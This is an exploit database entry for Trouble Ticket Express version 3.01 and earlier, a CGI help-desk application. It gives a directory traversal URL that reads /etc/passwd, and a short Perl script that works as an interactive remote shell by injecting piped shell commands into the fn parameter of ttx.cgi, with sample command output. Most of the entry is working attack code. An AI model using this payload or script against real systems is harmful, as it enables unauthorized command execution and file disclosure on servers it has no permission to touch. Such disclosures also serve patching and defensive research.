Trouble Ticket Express <= 3.01 - Remote Code Execution/Directory Traversal

2010-03-14T00:00:00
ID EDB-ID:11723
Type exploitdb
Reporter zombiefx
Modified 2010-03-14T00:00:00

Description

Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal. Webapps exploit for cgi platform

                                        
                                            # Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx &lt;darkernet@gmail.com&lt;mailto:darkernet@gmail.com&gt;&gt;
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:

# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd

#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = 'http://localhost/cgi-bin/ttx.cgi';
print '$ ';
while (&lt;&gt;) {
    print get( $url . '?cmd=file&fn=|' . $_ . '|' );
    print '$ ';
}
&lt;mailto:darkernet@gmail.com&gt;